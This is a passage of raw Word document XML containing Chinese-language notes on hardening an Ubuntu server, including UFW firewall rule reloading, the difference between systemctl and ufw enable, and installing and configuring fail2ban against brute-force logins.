    <w:p w14:paraId="36D22C1F" w14:textId="77777777" w:rsidR="005739AD" w:rsidRDefault="005739AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意不要删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键词，它永远是在最后一行。别忘了在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-A POSTROUTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行中替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以匹配你的计算机可以连接到互联网的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F36E24" w14:textId="77777777" w:rsidR="005739AD" w:rsidRDefault="005739AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D9EC8D" w14:textId="10D51C7E" w:rsidR="00B643F8" w:rsidRDefault="005739AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成后，保存并关闭文件。最后，通过命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用和命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A71E85" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365DDB1E" w14:textId="51A8796C" w:rsidR="00336F8D" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4746FCB9" w14:textId="53C54EA6" w:rsidR="00A3669D" w:rsidRDefault="00C30B57" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>ctl enable ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>fw enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536710BE" w14:textId="0665E156" w:rsidR="00C30B57" w:rsidRPr="00C30B57" w:rsidRDefault="00C30B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我对这两个命令疑惑，不过有相关的说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E4F35" w14:textId="2C90FF8C" w:rsidR="00A3669D" w:rsidRDefault="00A3669D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A3669D">
        <w:t>https://unix.stackexchange.com/questions/555020/how-should-i-enable-ufw-through-systemctl-enable-or-ufw-enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D40C2E" w14:textId="0D82621C" w:rsidR="00A3669D" w:rsidRDefault="00A3669D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFA72AF" w14:textId="5B3F57A3" w:rsidR="00C30B57" w:rsidRDefault="004B3F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是要不要考虑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为系统引导时启动的后台进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009FFC3" w14:textId="7D95660B" w:rsidR="0034304D" w:rsidRDefault="0034304D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身默认是关着的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ctl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stat</w:t>
      </w:r>
      <w:r>
        <w:t>us ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到他是</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inactive</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是不冲突的，要开启</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D7AAB">
        <w:t>ufw enable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE35FFE" w14:textId="77777777" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="0031630C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E68BAF" w14:textId="6B0EE500" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="0031630C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r w:rsidR="000E37DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>：禁止爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA2A512" w14:textId="46C31146" w:rsidR="00A80AA0" w:rsidRDefault="00A80AA0" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80AA0">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://www.myfreax.com/install-configure-fail2ban-on-ubuntu-20-04/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE01D00" w14:textId="45DBFB7C" w:rsidR="00A80AA0" w:rsidRDefault="00D603E4" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>是根据你配置好的日志文件，和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>jail</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>服务，来临时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ban ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>的，如果需要永久拒绝某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>，直接操作防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>更合适。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>只能根据配置好的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>jail_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>来临时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D603E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ban ip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13E5F5" w14:textId="4E06D1D5" w:rsidR="000365D3" w:rsidRPr="00D603E4" w:rsidRDefault="000365D3" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>直接日志位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: /var/log/fail2ban.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473F1D6" w14:textId="4C442731" w:rsidR="00D603E4" w:rsidRDefault="002927E6" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA07224" wp14:editId="00BEEFEA">
            <wp:extent cx="5903120" cy="1952308"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="913441205" name="图片 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41205" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6073873" cy="2008780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18261A41" w14:textId="77777777" w:rsidR="002927E6" w:rsidRDefault="002927E6" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432845E4" w14:textId="77777777" w:rsidR="002927E6" w:rsidRPr="00A80AA0" w:rsidRDefault="002927E6" w:rsidP="00A80AA0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5CEA95" w14:textId="0A4E4949" w:rsidR="00A3669D" w:rsidRDefault="00A3669D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A816A5" w14:textId="742A8F6E" w:rsidR="000E37DC" w:rsidRDefault="001B4D6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A80AA0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">apt update &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80AA0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>apt install fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184834F2" w14:textId="77777777" w:rsidR="000E37DC" w:rsidRDefault="000E37DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DE05BB" w14:textId="0C166DC6" w:rsidR="001B4D6C" w:rsidRPr="00A80AA0" w:rsidRDefault="0087593E" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80AA0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在默认情况下是禁用的，因为它的一些默认设置可能会导致不良效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088EB5DF" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AA78B7" w14:textId="43C6EDCD" w:rsidR="0087593E" w:rsidRDefault="0087593E" w:rsidP="0087593E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0087593E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl status fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5D7A7" w14:textId="447A8C49" w:rsidR="0087593E" w:rsidRDefault="0087593E" w:rsidP="00A80AA0">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fail2ban.service - Fail2Ban Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EECF9" w14:textId="77777777" w:rsidR="0087593E" w:rsidRDefault="0087593E" w:rsidP="0087593E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Loaded: loaded (/lib/systemd/system/fail2ban.service; disabled; vendor preset: enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825D4FD" w14:textId="77777777" w:rsidR="0087593E" w:rsidRDefault="0087593E" w:rsidP="0087593E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Active: inactive (dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3E4CE" w14:textId="6E68C127" w:rsidR="001B4D6C" w:rsidRDefault="0087593E" w:rsidP="0087593E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Docs: man:fail2ban(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDA6E6" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E4763F" w14:textId="627C7D01" w:rsidR="00A12F64" w:rsidRDefault="00A12F64" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688AD41" w14:textId="534E5909" w:rsidR="001B4D6C" w:rsidRPr="00A12F64" w:rsidRDefault="00A12F64" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12F64">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B7F70" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B04C9F3" w14:textId="5F2E2543" w:rsidR="001B4D6C" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置文件，但是不要动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，自己新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置文件在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中编辑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C43616" w14:textId="696AB880" w:rsidR="001B4D6C" w:rsidRPr="00595031" w:rsidRDefault="00595031" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595031">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cp /etc/fail2ban/jail.{conf,local}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5BB66C" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A57FAD9" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jail.local</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中有三个重要的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BE1B5" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bantime  = 1d</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F0499" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>findtime  = 10m</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C720B34" w14:textId="764EAEA6" w:rsidR="001B4D6C" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>maxretry = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2485AF" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A296277" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRPr="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD789C3" w14:textId="030066A2" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fail2ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附带许多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为示例，系统每一项服务都可以找到对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置。</w:t>
      </w:r>
